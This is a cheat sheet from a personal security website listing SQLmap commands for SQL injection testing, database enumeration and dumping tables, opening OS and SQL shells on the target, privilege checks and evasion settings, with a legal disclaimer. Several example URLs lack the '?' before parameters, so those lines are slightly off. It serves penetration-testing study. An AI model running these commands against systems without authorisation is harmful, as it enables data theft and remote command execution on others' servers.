Arty06's Website

sudo apt install Arty06

Home About Me Blog Writeups Projects Cheat-Sheet Useful Files

SQLmap Cheat Sheet

SQLmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

Basic Usage

sqlmap -u "http://example.com/param1=value1&param2=value2"
sqlmap -u "http://example.com" --data="POST data to test" --method=POST
sqlmap -u "http://example.com/param=value" --cookie="name=value; name2=value2"

Database Enumeration

sqlmap -u "http://example.com/param=value" --dbs
sqlmap -u "http://example.com/param=value" -D database_name --tables
sqlmap -u "http://example.com/param=value" -D database_name -T table_name --columns
sqlmap -u "http://example.com/param=value" -D database_name -T table_name --dump
sqlmap -u "http://example.com/param=value" -D database_name -T table_name -C "column1,column2" --dump

Operating System Interaction

sqlmap -u "http://example.com/param=value" --os-shell
sqlmap -u "http://example.com/param=value" --sql-shell
sqlmap -u "http://example.com/param=value" --os-cmd "whoami"

Advanced Enumeration

sqlmap -u "http://example.com/param=value" --banner
sqlmap -u "http://example.com/param=value" --privileges
sqlmap -u "http://example.com/param=value" --roles
sqlmap -u "http://example.com/param=value" --search -D database_wildcard -T table_wildcard -C column_wildcard

Automation and Detection Settings

sqlmap -u "http://example.com/param=value" --level=5
sqlmap -u "http://example.com/param=value" --risk=3
sqlmap -u "http://example.com/param=value" --random-agent

Usage of SQLmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

Fully generated with ChatGPT,wasnt exepecting that uh ? It’s all about asking the right questions…